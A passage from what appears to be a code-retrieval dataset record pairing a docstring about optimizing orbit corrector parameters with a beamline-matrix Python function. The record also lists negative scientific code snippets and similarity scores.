data.shape\n npix3 = 0\n \n mask = np.zeros(shape)\n \n for poly in region['params']['Polygons']:\n # Add all the polygons together\n logger.info(\"Adding polygons to the mask.\")\n mask += poly.make_mask(shape)\n \n logger.info(\"Normalizing the mask to unity.\")\n mask = np.ceil(mask/npolys)\n \n if naxis > 3:\n mdata = data[0]*np.tile(mask, (npix3,1,1))\n else:\n mdata = data*np.tile(mask, (npix3,1,1))\n \n if mode == 'sum':\n spec = mdata.sum(axis=1).sum(axis=1)\n elif 'avg' in mode.lower():\n spec = mdata.mean(axis=1).mean(axis=1)\n elif 'flux' in mode.lower():\n spec = mdata.sum(axis=1).sum(axis=1)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif 'all' in region['shape']:\n \n if naxis > 3:\n data = data[0]\n spec = proc_data(data, mode, region)\n elif naxis == 3:\n data = data\n spec = proc_data(data, mode, region)\n else:\n spec = proc_data(data, mode, region)\n \n return spec", "def undulations(**kwargs):\n\n\t#---parameters\n\tsn = kwargs['sn']\n\twork = kwargs['workspace']\n\tcalc = kwargs['calc']\n\tupname = 'lipid_abstractor'\n\tgrid_spacing = calc['specs']['grid_spacing']\n\tvecs = datmerge(kwargs,upname,'vecs')\n\tnframes = int(np.sum(datmerge(kwargs,upname,'nframes')))\n\ttrajectory = datmerge(kwargs,upname,'points')\n\tattrs,result = {},{}\n\t#---! hacking through error with monolayer separation\n\ttry: monolayer_indices = kwargs['upstream'][upname+'0']['monolayer_indices']\n\texcept: monolayer_indices = kwargs['upstream'][upname]['monolayer_indices']\n\t#---choose grid dimensions\n\tgrid = np.array([round(i) for i in np.mean(vecs,axis=0)/grid_spacing])[:2]\n\t#---! removed timeseries from result for new version of omnicalc\n\t#---parallel\n\tmesh = [[],[]]\n\tfor mn in range(2):\n\t\tstart = time.time()\n\t\tmesh[mn] = Parallel(n_jobs=work.nprocs,verbose=0,require='sharedmem')(\n\t\t\tdelayed(makemesh_regular)(\n\t\t\t\ttrajectory[fr][np.where(monolayer_indices==mn)],vecs[fr],grid)\n\t\t\tfor fr in framelooper(nframes,start=start,text='monolayer %d, frame'%mn))\n\tchecktime()\n\n\t#---pack\n\tresult['mesh'] = np.array(mesh)\n\tresult['grid'] = np.array(grid)\n\tresult['nframes'] = np.array(nframes)\n\tresult['vecs'] = vecs\n\tattrs['grid_spacing'] = grid_spacing\n\treturn result,attrs", "def identify_divtrans(bed):\n pass", "def computePointSectionArea(self,wingIndex,segmentIndex,eta,xsi):\n # tigl.wingGetUpperPoint(wingIndex, segmentIndex, eta -> y, xsi->x)\n # WARNING there is a slight difference in the area computed with this\n # method ans CPACSCREATOR. At the moment it is undetermined who is more\n # accurate.\n N = 20\n xsi1 = np.linspace(0,1,N)\n upper = np.empty((N,3))\n lower = np.empty((N,3))\n\n\n # t = np.max(np.abs(upper[:][2] - lower[:][2]))\n \n for i in range(N):\n U = self.tigl.wingGetUpperPoint(wingIndex,segmentIndex,eta,xsi1[i])\n L = self.tigl.wingGetLowerPoint(wingIndex,segmentIndex,eta,xsi1[i])\n upper[i] = np.array(U)\n lower[i] = np.array(L)\n v1 = upper[0]-upper[-1]\n v2 = upper[7] - lower[7]\n c = np.abs(upper[0][0] - upper[-1][0])\n t = np.max(np.abs(upper[:][2] - lower[:][2]))\n print(c)\n area = c*0.1*t\n # sys.exit()\n # v1xv2 = np.cross(v1,v2)\n # upper = np.flip(upper,axis=0)\n # wingSectionPoints = np.concatenate((upper, lower))\n # ey_0 = np.array([0,1,0])\n # e_1 = v1xv2\n # # Computes the cross prodct\n # cross = np.cross(ey_0,e_1)\n # normCross = np.linalg.norm(cross)\n # cross = cross/normCross\n # if normCross < 1e-8:\n # # No need to rotate\n # wingSectionPoints = np.delete(wingSectionPoints,1,1)\n # hull = ConvexHull(wingSectionPoints)\n # area = hull.volume\n # else:\n # ab = inner1d(ey_0,e_1)\n # a = np.linalg.norm(ey_0)\n # b = np.linalg.norm(e_1)\n # angle = np.arccos(ab / (a*b))\n # logger.debug(\"angle: \"+str(angle))\n # quat = angle*cross\n # r = R.from_rotvec(quat)\n # # Deletes the y column since the Convex hull will struggle with\n # # a 3d plane otherwise\n # wingSectionPoints = r.apply(wingSectionPoints)\n # wingSectionPoints = np.delete(wingSectionPoints,1,1)\n # hull = ConvexHull(wingSectionPoints)\n # # WARNING since we have built a 2D surface, the function is set up\n # # in a way that this is correct!\n # area = hull.volume\n\n logger.debug(\"Computed section area: \"+str(area))\n\n return area" ]
[ "0.5563447", "0.55561185", "0.55355847", "0.5400956", "0.5346773", "0.5164223", "0.51494545", "0.5128714", "0.5126724", "0.50905246", "0.5079524", "0.5058356", "0.5053756", "0.5040289", "0.50352335", "0.50240916", "0.5023575", "0.50167745", "0.50061435", "0.49880677", "0.4979276", "0.49765912", "0.497521", "0.49707502", "0.4961714", "0.49603733", "0.4955646", "0.49478093", "0.49399075", "0.49365303", "0.49212822", "0.49198762", "0.4916389", "0.49133995", "0.49065515", "0.49048886", "0.49017796", "0.49001706", "0.4870099", "0.48675463", "0.48601115", "0.4844244", "0.4844244", "0.48380366", "0.4834202", "0.48265484", "0.48244828", "0.48201263", "0.48155394", "0.48038357", "0.48018062", "0.4791986", "0.4789894", "0.47746244", "0.47664556", "0.4762008", "0.4756015", "0.47553682", "0.47531027", "0.47494373", "0.4739633", "0.47347695", "0.47304714", "0.4728624", "0.47285685", "0.4724441", "0.47227183", "0.47180545", "0.47154406", "0.47094974", "0.47048315", "0.47001556", "0.4700039", "0.4697311", "0.4692551", "0.46912497", "0.46820435", "0.46747327", "0.4673422", "0.4667888", "0.46651855", "0.46627945", "0.46619123", "0.46423444", "0.4640014", "0.46384132", "0.46365944", "0.46351212", "0.46348232", "0.46345726", "0.46335065", "0.46245652", "0.46237168", "0.46233666", "0.46216357", "0.4619536", "0.461912", "0.46175826", "0.46150276", "0.46142673" ]
0.6365625
0
We want to use this function to optimize parameters for orbit correctors. Indeed, we always need two orbit correctors to do this job.
def analyze_orbit_corrector(OC1, OC2, beamline, phase_beg): M = np.identity(4) OC_parameters = np.zeros(4) for element in beamline: M = np.dot(element.M1, M) # Since the X and Y are decoupled, we can treat them separately. M_x = M[0:2, 0:2] M_y = M[2:4, 2:4] L1 = [[OC1.length/2], [1]] L2 = [[OC2.length/2], [1]] M_OC1 = np.array(OC1.M1)[0:2, 0:2] M_OC2 = np.array(OC2.M1)[0:2, 0:2] # The following part solve the cx_1 and cx_2 M1_x = np.linalg.multi_dot([M_OC2, M_x, L1]) M2_x = np.linalg.multi_dot([M_OC2, M_x, M_OC1]) M_OC_x = np.hstack((M1_x, L2)) OC_parameters[0:2] = -np.linalg.multi_dot([np.linalg.inv(M_OC_x), M2_x, phase_beg[0:2]]) # The end of the X-part # The following part solve the cy_1 and cy_2 M1_y = np.linalg.multi_dot([M_OC2, M_y, L1]) M2_y = np.linalg.multi_dot([M_OC2, M_y, M_OC1]) M_OC_y = np.hstack((M1_y, L2)) OC_parameters[2:4] = -np.linalg.multi_dot([np.linalg.inv(M_OC_y), M2_y, phase_beg[2:4]]) # The end of the Y-part return OC_parameters
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def solve_prep(self):\n\n par = self.par\n sol = self.sol\n\n # a. retirement\n sol.m_ret = np.zeros((par.T,par.Nm_ret))\n sol.c_ret = np.zeros((par.T,par.Nm_ret))\n sol.a_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_v_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_vm_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_vn_ret = np.zeros((par.T,par.Nm_ret))\n\n # b. working\n if par.solmethod == 'G2EGM':\n\n sol.c = np.zeros((par.T,par.Nn,par.Nm))\n sol.d = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vm = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vn = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.ucon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.ucon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.ucon_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.dcon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.dcon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.dcon_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.acon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.acon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.acon_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.z = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.w = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wa = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wb = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n \n elif par.solmethod == 'NEGM':\n\n sol.c = np.zeros((par.T,par.Nn,par.Nm))\n sol.d = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vn = np.zeros((0,0,0))\n sol.inv_vm = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.w = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wa = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wb = np.zeros((0,0,0))\n \n sol.c_pure_c = np.zeros((par.T,par.Nb_pd,par.Nm))\n sol.inv_v_pure_c = np.zeros((par.T,par.Nb_pd,par.Nm))", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def optimize(self):\n prm = (self.b,self.c)\n d = self.d\n no = int(d*d)\n bounds = [(-1,1)]*no\n resG = differential_evolution(inpSc.entBias, bounds, args = prm, popsize = 40, disp = False)\n\n xOpt = resG.x\n xOpt = xOpt/(np.linalg.norm(xOpt))\n\n #Refine the global optimization by performing a second local optimizaiton\n x0 = xOpt\n\n res = minimize(inpSc.entBias, x0, args = prm, method='BFGS', options={'disp': False})\n xOpt = res.x\n xOpt = xOpt/(np.linalg.norm(xOpt))\n self.rhoOp = inpSc.getMat(xOpt, d)\n self.Q1 = -res.fun", "def optimize(self):\n # Loop through every WD and WS individually\n wd_array = self.fi_subset.floris.flow_field.wind_directions\n ws_array = self.fi_subset.floris.flow_field.wind_speeds\n for nwsi, ws in enumerate(ws_array):\n\n self.fi_subset.reinitialize(wind_speeds=[ws])\n\n for nwdi, wd in enumerate(wd_array):\n # Find turbines to optimize\n turbs_to_opt = self._turbs_to_opt_subset[nwdi, nwsi, :]\n if not any(turbs_to_opt):\n continue # Nothing to do here: no turbines to optimize\n\n # Extract current optimization problem variables (normalized)\n yaw_lb = self._minimum_yaw_angle_subset_norm[nwdi, nwsi, turbs_to_opt]\n yaw_ub = self._maximum_yaw_angle_subset_norm[nwdi, nwsi, turbs_to_opt]\n bnds = [(a, b) for a, b in zip(yaw_lb, yaw_ub)]\n x0 = self._x0_subset_norm[nwdi, nwsi, turbs_to_opt]\n\n J0 = self._farm_power_baseline_subset[nwdi, nwsi]\n yaw_template = self._yaw_angles_template_subset[nwdi, nwsi, :]\n turbine_weights = self._turbine_weights_subset[nwdi, nwsi, :]\n yaw_template = np.tile(yaw_template, (1, 1, 1))\n turbine_weights = np.tile(turbine_weights, (1, 1, 1))\n\n # Define cost function\n def cost(x):\n x_full = np.array(yaw_template, copy=True)\n x_full[0, 0, turbs_to_opt] = x * self._normalization_length\n return (\n - 1.0 * self._calculate_farm_power(\n yaw_angles=x_full,\n wd_array=[wd],\n turbine_weights=turbine_weights\n )[0, 0] / J0\n )\n\n # Perform optimization\n residual_plant = minimize(\n fun=cost,\n x0=x0,\n bounds=bnds,\n method=self.opt_method,\n options=self.opt_options,\n )\n\n # Undo normalization/masks and save results to self\n self._farm_power_opt_subset[nwdi, nwsi] = -residual_plant.fun * J0\n self._yaw_angles_opt_subset[nwdi, nwsi, turbs_to_opt] = (\n residual_plant.x * self._normalization_length\n )\n\n # Finalize optimization, i.e., retrieve full solutions\n df_opt = self._finalize()\n return df_opt", "def FitnessSkopt(inputParams):\n\n elecsusParams = baseParams.copy()\n\n # NOTE: No bPhi as of yet.\n paramDict = {'Bfield': inputParams[0], \"T\": inputParams[1], 'Btheta': np.deg2rad(inputParams[2]), 'Etheta': np.deg2rad(inputParams[3])}\n\n # This is the full dictionary to use on ElecSus.\n elecsusParams.update(paramDict)\n\n # First generate the output transmission as before.\n inputE = np.array([np.cos(elecsusParams[\"Etheta\"]), np.sin(elecsusParams[\"Etheta\"]), 0])\n\n # Call ElecSus to obtain the output electric field.\n try:\n # There may at times be issues with ElecSus, such as when NaN is entered as a variable.\n [outputE] = elecsus.calculate(globalDetuning, inputE, elecsusParams, outputs = [\"E_out\"])\n except:\n print(\"There was an issue in ElecSus, so this iteration will return a figure of merit of 0. Here are the input parameters:\")\n print(\"Input parameters: \" + str(elecsusParams))\n print(\"Input field: \" + str(inputE))\n return 0.0\n \n # Use a Jones matrix to determine the electric field after the action of the second polariser. As this is a single filter, the two polarisers are crossed.\n polariserAngle = elecsusParams[\"Etheta\"] + np.pi/2\n\n # Define the Jones matrix. Though only explicitly defined for the x-y plane, we add the third dimension so that we can use all 3 dimensions of the output field.\n jonesMatrix = np.matrix([[np.cos(polariserAngle)**2, np.sin(polariserAngle)*np.cos(polariserAngle), 0],\n\t\t\t\t\t\t\t\t[np.sin(polariserAngle)*np.cos(polariserAngle), np.sin(polariserAngle)**2, 0],\n [0, 0, 1]])\n\n # Get the output from the filter and the polarisers.\n singleFilterOutputE = np.array(jonesMatrix * outputE)\n\n # Get the transmission.\n singleFilterTransmission = (singleFilterOutputE * singleFilterOutputE.conjugate()).sum(axis=0)\n\n ENBW = ((integrate(singleFilterTransmission, globalDetuning)/singleFilterTransmission.max().real)/1e3).real\n\n figureOfMerit = (singleFilterTransmission.max()/ENBW).real\n \n if np.isnan(figureOfMerit):\n # Usually occurs in the case of high temperatures and B fields, since the transmission is just a flat line.\n print(\"Figure of merit is NaN! Here are the input parameters:\")\n print(str(elecsusParams))\n return 0.0\n else:\n return -1.0 * figureOfMerit", "def set_up_orbit_correctors(ps_beg, delay, id_slice1, ds_slice, zplot, id_slices, U_core, lambdaref):\n SXSS = Chicane(3.2716, 0.362, 0.830399, delay[0])\n HXSS = Chicane(3.2, 0.3636, 0.5828, delay[1])\n\n OC2 = [CORR08, D1_SXSS, SXSS, D2_SXSS, QUAD09, CORR09]\n OC3 = [CORR15, D1_HXSS, HXSS, D2_HXSS, QUAD16, CORR16]\n\n ps_end1 = beam_transportation(ps_beg, U_core[0])\n\n # ps_end1 is a 4-by-N array. N is the number of macro-particles. It is the full\n # 4D phase space distribution at the end of the first undulator section.\n\n # The id of the slice on the axis in the second undulator section\n on_axis_id_U2 = int(id_slice1+delay[0]/ds_slice+ (8*110)*lambdaref/ds_slice) # The last part is slippage\n\n print(on_axis_id_U2)\n\n ps_end_slice1 = beam_property_along_s(ps_end1, id_slices)[0:4, :]\n ps_on_axis_2 = np.ravel(ps_end_slice1[:, on_axis_id_U2])\n\n # print(ps_on_axis_2)\n\n OC2_optimized = analyze_orbit_corrector(OC2[0], OC2[-1], OC2[1:-1], ps_on_axis_2)\n print(OC2_optimized)\n CORR08_new = Orbit_Corrector(OC2[0].length, OC2_optimized[0], OC2_optimized[2])\n CORR09_new = Orbit_Corrector(OC2[-1].length, OC2_optimized[1], OC2_optimized[3])\n\n # The whole U2 with optimized orbit correctors\n U2_new = [CORR08_new] + OC2[1:-1] + [CORR09_new] + U_core[1]\n ps_end2 = beam_transportation(ps_end1, U2_new)\n\n # ps_end2 is a 4-by-N array. N is the number of macro-particles. It is the full\n # 4D phase space distribution at the end of the second undulator section.\n\n # The id of the slice on the axis in the third undulator section\n on_axis_id_U3 = int(id_slice1+(delay[0]+delay[1])/ds_slice +(14*110*lambdaref)/ds_slice) # The last term is the slipage\n\n print(on_axis_id_U3)\n\n ps_end_slice2 = beam_property_along_s(ps_end2, id_slices)[0:4, :]\n ps_on_axis_3 = np.ravel(ps_end_slice2[ :, on_axis_id_U3])\n\n # print(ps_on_axis_3)\n\n OC3_optimized = analyze_orbit_corrector(OC3[0], OC3[-1], OC3[1:-1], ps_on_axis_3)\n print(OC3_optimized)\n CORR15_new = Orbit_Corrector(OC3[0].length, OC3_optimized[0], OC3_optimized[2])\n CORR16_new = Orbit_Corrector(OC3[-1].length, OC3_optimized[1], OC3_optimized[3])\n\n U3_new = [CORR15_new] + OC3[1:-1] + [CORR16_new] + U_core[2]\n\n Undulator_Beamline = U_core[0]+U2_new+U3_new\n\n return Undulator_Beamline", "def calc(self):\n\n # the following if query ensures that volume- and interaction-terms\n # are only calculated if tau > 0.\n # (to avoid nan-values from invalid function-evaluations)\n\n if self.V.tau.shape == (1,):\n Isurf = self.surface()\n # differentiation for non-existing canopy, as otherwise NAN values\n if self.V.tau > 0.:\n Ivol = self.volume()\n if self.int_Q is True:\n Iint = self.interaction()\n else:\n Iint = np.array([0.])\n else:\n Ivol = np.array([0.])\n Iint = np.array([0.])\n else:\n # calculate surface-term (valid for any tau-value)\n Isurf = self.surface()\n\n # store initial parameter-values\n old_t_0 = self.t_0\n old_p_0 = self.p_0\n old_t_ex = self.t_ex\n old_p_ex = self.p_ex\n\n old_tau = self.V._get_tau()\n old_omega = self.V._get_omega()\n old_NN = self.SRF._get_NormBRDF()\n\n # set mask for tau > 0.\n mask = old_tau > 0.\n valid_index = np.where(mask)\n inval_index = np.where(~mask)\n\n # set parameter-values to valid values for calculation\n self.t_0 = old_t_0[valid_index[0]]\n self.p_0 = old_p_0[valid_index[0]]\n self.t_ex = old_t_ex[valid_index[0]]\n self.p_ex = old_p_ex[valid_index[0]]\n\n # squeezing the arrays is necessary since the setter-function for\n # tau, omega and NormBRDF automatically adds an axis to the arrays!\n self.V.tau = np.squeeze(old_tau[valid_index[0]])\n if np.array(self.V.omega).size != 1:\n self.V.omega = np.squeeze(old_omega[valid_index[0]])\n if np.array(self.SRF.NormBRDF).size != 1:\n self.SRF.NormBRDF = np.squeeze(old_NN[valid_index[0]])\n\n # calculate volume and interaction term where tau-values are valid\n _Ivol = self.volume()\n if self.int_Q is True:\n _Iint = self.interaction()\n else:\n _Iint = np.full_like(self.t_0, 0.)\n\n # reset parameter values to old values\n self.t_0 = old_t_0\n self.p_0 = old_p_0\n self.t_ex = old_t_ex\n self.p_ex = old_p_ex\n\n # squeezing the arrays is necessary since the setter-function for\n # tau, omega and NormBRDF automatically add an axis to the arrays!\n self.V.tau = np.squeeze(old_tau)\n self.V.omega = np.squeeze(old_omega)\n self.SRF.NormBRDF = np.squeeze(old_NN)\n\n # combine calculated volume-contributions for valid tau-values\n # with zero-arrays for invalid tau-values\n Ivol = np.ones_like(self.t_0)\n Ivol[valid_index[0]] = _Ivol\n Ivol[inval_index[0]] = np.ones_like(Ivol[inval_index[0]]) * 0.\n\n # combine calculated interaction-contributions for valid tau-values\n # with zero-arrays for invalid tau-values\n if self.int_Q is True:\n Iint = np.ones_like(self.t_0)\n Iint[valid_index[0]] = _Iint\n Iint[inval_index[0]] = np.ones_like(Iint[inval_index[0]]) * 0.\n else:\n Iint = np.full_like(self.t_0, 0.)\n\n return Isurf + Ivol + Iint, Isurf, Ivol, Iint", "def solve(\n self,\n projections: Projections,\n initial_squad: Squad,\n next_gw: int = None,\n force_chips: Dict[int, str] = None,\n force_players: Dict[str, list] = None,\n force_transfers: Dict[int, dict] = None,\n price_changes: Dict[str, Iterable] = None,\n time_limit: float = None,\n optimizer: type = pulp.GUROBI,\n message: bool = True\n ):\n if next_gw is None:\n next_gw = sorted([int(column.split('_')[0]) for column in projections.columns if column.endswith('Pts')])[0]\n # Set up useful references\n initial_players = initial_squad.players\n initial_itb = initial_squad.itb\n initial_fts = initial_squad.fts\n active_chip = initial_squad.active_chip\n players = projections.index\n positions = ('G', 'D', 'M', 'F')\n teams = projections['Team'].unique()\n gw_interval = list(range(next_gw, next_gw + self.horizon))\n\n # Initialise optimisation model\n prob = LpProblem('FPL_transfer_optimisation')\n\n # Initialise decision variables\n default_args = {'index': players, 'columns': gw_interval, 'column_type': 'gw', 'model': prob}\n lineup = DecisionMatrix.lp_variable('lineup', **default_args)\n bench_gk = DecisionMatrix.lp_variable('bench_gk', **default_args)\n bench_1 = DecisionMatrix.lp_variable('bench_1', **default_args)\n bench_2 = DecisionMatrix.lp_variable('bench_2', **default_args)\n bench_3 = DecisionMatrix.lp_variable('bench_3', **default_args)\n squad = DecisionMatrix.lp_variable('squad', **default_args)\n prob += squad == lineup + bench_gk + bench_1 + bench_2 + bench_3\n squad[next_gw - 1] = pd.Series(squad.index).isin(initial_players).astype(int)\n captain = DecisionMatrix.lp_variable('captain', **default_args)\n vice_captain = DecisionMatrix.lp_variable('vice_captain', **default_args)\n transfer_in = DecisionMatrix.lp_variable('transfer_in', **default_args)\n transfer_out = DecisionMatrix.lp_variable('transfer_out', **default_args)\n itb = DecisionSeries(data=[initial_itb], index=[next_gw - 1], model=prob)\n # itb is previous GW's itb + revenue from outgoing players + cost of incoming players\n for i, gw in enumerate(gw_interval):\n itb[gw] = itb[gw - 1] + (transfer_out[gw] * projections['SV']).sum() - \\\n (transfer_in[gw] * projections['BV']).sum() - self.budget_decay_rate\n\n # Add problem constraints to optimisation model\n prob += squad == squad.lag(1) + transfer_in - transfer_out # New squad is previous squad plus transfers\n prob += squad.drop(next_gw - 1, axis=1) <= 1 # Each player can only appear in the squad once\n prob += lineup.sum() == 11 # Lineup contains 11 players\n prob += bench_gk.sum() == 1 # There is 1 bench GK;\n prob += bench_1.sum() == 1 # 1 1st bench slot;\n prob += bench_2.sum() == 1 # 1 2nd bench slot;\n prob += bench_3.sum() == 1 # 1 3rd bench slot;\n prob += captain.sum() == 1 # 1 Captain;\n prob += transfer_out.sum() == transfer_in.sum() # Transfers in must be same as transfers out\n\n prob += vice_captain.sum() == 1 # 1 vice-captain\n prob += captain <= lineup # Captain must be in lineup\n prob += vice_captain <= lineup # Vice-captain must be in lineup\n prob += captain + vice_captain <= 1 # Captain and vice-captain must be different players\n for position, limit in zip(positions, (2, 5, 5, 3)):\n prob += squad[projections['Pos'] == position].sum() == limit # Set squad position structure\n for team in teams:\n prob += squad[projections['Team'] == team].sum() <= 3 # No more than 3 players from each team\n if self.exclude_everton:\n prob += squad[projections['Team'] == 'Everton'].sum() == 0 # Option to exclude Everton players\n prob += bench_gk <= (projections['Pos'] == 'G') # Bench GK must be a goalkeeper\n prob += (lineup * (projections['Pos'] == 'G')).sum() == 1 # There must be 1 goalkeeper in lineup\n prob += (lineup * (projections['Pos'] == 'D')).sum() >= 3 # There must be at least 3 defenders in lineup\n prob += itb[[False] + [True] * self.horizon] >= 0 # The itb amount must be non-negative for future GWs\n\n # Set up transfer logic\n transfer_args = {'index': gw_interval, 'column_type': 'gw', 'model': prob, 'cat': 'Integer'}\n aux = DecisionSeries.lp_variable('aux', **transfer_args)\n free_transfers = DecisionSeries(data=[initial_fts], index=[next_gw - 1], model=prob) + DecisionSeries.\\\n lp_variable('free_transfers', **transfer_args)\n penalised_transfers = DecisionSeries.lp_variable('penalised_transfers', **transfer_args)\n transfer_counts = transfer_in.sum()\n frees_minus_transfers = free_transfers.lag(1) - transfer_counts\n lower_bound = aux * 15 - 14\n upper_bound = aux * 2\n if initial_fts > 1:\n prob += transfer_counts[next_gw] >= 1\n prob += frees_minus_transfers >= lower_bound\n prob += frees_minus_transfers <= upper_bound\n prob += free_transfers == aux + 1\n # penalised_transfers is max(transfers - frees, 0)\n prob += penalised_transfers >= -frees_minus_transfers\n prob += penalised_transfers >= 0\n\n ev_values = projections[[f'{gw}_Pts' for gw in gw_interval]] # Restructure projections data for easier\n ev_values.columns = gw_interval # manipulation\n objective = ((lineup + captain) * ev_values).sum() # Objective function is sum of lineup and captain pts\n objective += (vice_captain * self.vc_weight * ev_values).sum() # Add vice-captain weight\n for loc, bench_slot in enumerate((bench_gk, bench_1, bench_2, bench_3)):\n objective += (bench_slot * ev_values).sum() * self.bench_weights[:, loc] # Add bench weights to objective\n if force_transfers is None:\n objective -= penalised_transfers * 4 # Take away 4 points from each hit taken\n if force_chips is not None:\n self.force_chips = force_chips\n for gw in force_chips:\n if force_chips[gw] == 'wildcard':\n objective[gw] += penalised_transfers[gw] * 4 # Remove penalised points in wildcard week\n\n if force_players is not None:\n for player in force_players['include']:\n prob += squad.T[player].drop(next_gw - 1) == 1\n for player in force_players['exclude']:\n prob += squad.T[player].drop(next_gw - 1) == 0\n if 'include_for_gw' in force_players:\n for gw in force_players['include_for_gw']:\n try:\n prob += squad[force_players['include_for_gw'][gw], gw] == 1\n except ValueError:\n pass\n if 'exclude_for_gw' in force_players:\n for gw in force_players['exclude_for_gw']:\n try:\n prob += squad[force_players['exclude_for_gw'][gw], gw] == 0\n except ValueError:\n pass\n self.rolls = frees_minus_transfers + penalised_transfers\n prob += self.rolls <= 2\n\n if self.penalties is not None:\n if time_decay in self.penalties:\n self.penalties[time_decay] = self.penalties.pop(time_decay) # Apply time decay after other penalties\n for penalty, parameter in self.penalties.items():\n objective = penalty(objective, self, parameter) # Apply external penalty functions\n\n # Apply price change EV\n if price_changes is not None:\n gws_remaining = 38 - next_gw + 1\n for player in price_changes['rise']:\n objective[next_gw] += self.million_value / 30 * squad[player, next_gw] * gws_remaining\n for player in price_changes['drop']:\n objective[next_gw] -= self.million_value / 10 * squad[player, next_gw] * gws_remaining\n\n prob.model += objective.sum()\n prob.solve(time_limit=time_limit, optimizer=optimizer, message=message)\n\n return Solution(lineup, bench_gk, bench_1, bench_2, bench_3, captain, vice_captain, objective, transfer_in,\n transfer_out, itb, projections, free_transfers, penalised_transfers, force_chips)", "def _solve_explicit(self, initial_conditions):\n coeff = self.a ** 2 * self.tau / self.h ** 2\n current_solution = initial_conditions\n next_solution = np.empty_like(current_solution)\n solutions = []\n\n for t in self.t_grid:\n next_solution[1:-1] = (\n current_solution[1:-1]\n + (current_solution[:-2] - 2 * current_solution[1:-1] + current_solution[2:]) * coeff\n ) + self.rhs(self.x_grid[1:-1], t) * self.tau\n\n # left bc\n if self.left_bc_type == \"DIRICHLET\":\n next_solution[0] = self.left_bc(t)\n elif self.left_bc_type == \"NEUMANN\":\n next_solution[0] = (\n 4 * next_solution[1]\n - next_solution[2]\n - 2 * self.h * self.left_bc(t)\n ) / 3.0\n\n # right bc\n if self.right_bc_type == \"DIRICHLET\":\n next_solution[-1] = self.right_bc(t)\n elif self.right_bc_type == \"NEUMANN\":\n next_solution[-1] = (\n 4 * next_solution[-2]\n - next_solution[-3]\n + 2 * self.h * self.right_bc(t)\n ) / 3.0\n if self.mode == \"VISUALIZATION\":\n solutions.append((t, next_solution.copy()))\n current_solution = next_solution\n if self.mode == \"TEST\":\n # print(\"Result: \", current_solution.tolist())\n # print(\"Right answer: \", self.anl_solution.tolist())\n self._norma(current_solution)\n elif self.mode == \"VISUALIZATION\":\n return solutions", "def solve(self):\n \n # Check if cost is available for both estimators\n if not self.est0.cost_avail or not self.est1.cost_avail:\n self.comp_cost = False\n \n # Initial estimate from the input node\n if self.comp_cost:\n z0, zvar0, cost0 = self.est0.est_init(return_cost=True)\n else:\n z0, zvar0 = self.est0.est_init(return_cost=False)\n cost0 = 0\n self.z0 = z0\n self.zvar0 = zvar0\n self.cost0 = cost0\n \n # Initialize other variables\n self.var_cost0 = 0\n self.var_cost1 = 0\n self.cost = 0\n self.s = np.zeros(self.shape1)\n \n for it in range(self.nit):\n \n # Forward transform to est1\n t0 = time.time()\n rvar1_new = self.A.var_dot(self.zvar0)\n rvar1_rep = common.repeat_axes(rvar1_new,self.shape1,\\\n self.var_axes1,rep=False)\n z1_mult = self.A.dot(self.z0)\n r1_new = z1_mult - rvar1_rep*self.s\n \n # Damping\n if it > 0: \n self.r1 = (1-self.step)*self.r1 + self.step*r1_new\n self.rvar1 = (1-self.step)*self.rvar1 + self.step*rvar1_new\n else:\n self.r1 = r1_new\n self.rvar1 = rvar1_new\n\n # Estimator 1 \n if self.comp_cost: \n z1, zvar1, cost1 = self.est1.est(self.r1, self.rvar1, return_cost=True) \n if not self.map_est:\n cost1 -= self.cost_adjust(self.r1,z1,self.rvar1,zvar1,\\\n self.shape1,self.var_axes1)\n else:\n z1, zvar1 = self.est1.est(self.r1, self.rvar1, return_cost=False) \n cost1 = 0\n self.z1 = z1\n self.zvar1 = zvar1\n self.cost1 = cost1 \n con_new = np.mean(np.abs(z1-z1_mult)**2) \n \n # Reverse nonlinear transform to est 0\n self.s = (self.z1-self.r1)/rvar1_rep\n self.sprec = 1/self.rvar1*(1-self.zvar1/self.rvar1)\n t1 = time.time()\n self.time_est1 = t1-t0\n \n # Reverse linear transform to est 0 \n rvar0_new = 1/self.A.var_dotH(self.sprec)\n rvar0_rep = common.repeat_axes(rvar0_new,self.shape0,\\\n self.var_axes0,rep=False)\n r0_new = self.z0 + rvar0_rep*self.A.dotH(self.s)\n \n # Damping\n if it > 0:\n self.r0 = (1-self.step)*self.r0 + self.step*r0_new\n self.rvar0 = (1-self.step)*self.rvar0 + self.step*rvar0_new\n else:\n self.r0 = r0_new\n self.rvar0 = rvar0_new\n \n \n # Estimator 0\n if self.comp_cost:\n z0, zvar0, cost0 = self.est0.est(self.r0, self.rvar0, return_cost=True)\n if not self.map_est:\n cost0 -= self.cost_adjust(self.r0,z0,self.rvar0,zvar0,\\\n 